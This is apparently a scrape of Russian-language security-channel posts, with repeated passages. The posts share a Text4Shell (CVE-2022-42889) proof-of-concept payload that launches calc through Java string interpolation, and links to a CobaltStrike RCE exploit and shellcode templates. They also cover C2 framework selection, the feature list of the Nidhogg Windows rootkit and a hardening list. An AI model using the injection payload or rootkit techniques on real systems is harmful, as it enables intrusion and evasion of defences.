CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
StringSubstitutor.createInterpolator().replace("${noscript:js:new java.lang.ProcessBuilder(\"calc\").start()}");
#apache👍15
CVE-2022-39197-master.zip
104.1 KB
CobaltStrike <= 4.7.1 RCE
пора бы обновляться до 4.7.2 (как раз недавно вышла)
пора бы обновляться до 4.7.2 (как раз недавно вышла)
CVE-2022-39197 RCE POC👍3🔥1
Shellcode Template
Легко модифицируемые шеллкод-шаблоны под
#windows #shellcode
Легко модифицируемые шеллкод-шаблоны под
Windows x64/x86
Download#windows #shellcode
🔥7👍1
CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
🔥10
Кто поможет vx-underground ? Чутка места не хватает у ребят
1,245,000,000 malware samples
#underground #malware
1,245,000,000 malware samples
#underground #malware
🔥22
Поговорим о C&C (С2)
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜
#c&c #c2
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜
#c&c #c2
👍10🔥3😱3
Знакомьтесь -
—- Из фишек —-
* Process hiding
* Process elevation
* Anti process kill
* Anti process dumping
* Bypass pe-sieve
* Anti file deletion
* Anti file overwriting
* Registry keys and values anti deletion
* Registry keys and values hiding
* Registry keys and values anti overwriting
* Querying currently protected processes, files and registry keys & values
* Arbitrary R/W
* Function patching
* Built-in AMSI bypass
* Built-in ETW patch
download
#windows #rootkit
Nidhogg
Это такой rootkit под windows. Вчера кстати обновился !—- Из фишек —-
* Process hiding
* Process elevation
* Anti process kill
* Anti process dumping
* Bypass pe-sieve
* Anti file deletion
* Anti file overwriting
* Registry keys and values anti deletion
* Registry keys and values hiding
* Registry keys and values anti overwriting
* Querying currently protected processes, files and registry keys & values
* Arbitrary R/W
* Function patching
* Built-in AMSI bypass
* Built-in ETW patch
download
#windows #rootkit
👍15🔥3
awesome-security-hardening
*
Когда то мы уже публиковали что то подобное, но контент постоянно обновляется.
Всегда найдется не прочитанная раздел\глава\абзац.
Привет
Download
#security #blueteam #devsecops
*
Когда то мы уже публиковали что то подобное, но контент постоянно обновляется.
Всегда найдется не прочитанная раздел\глава\абзац.
Привет
blueTeamы и DevSecOpsы)))Download
#security #blueteam #devsecops
👍5🔥3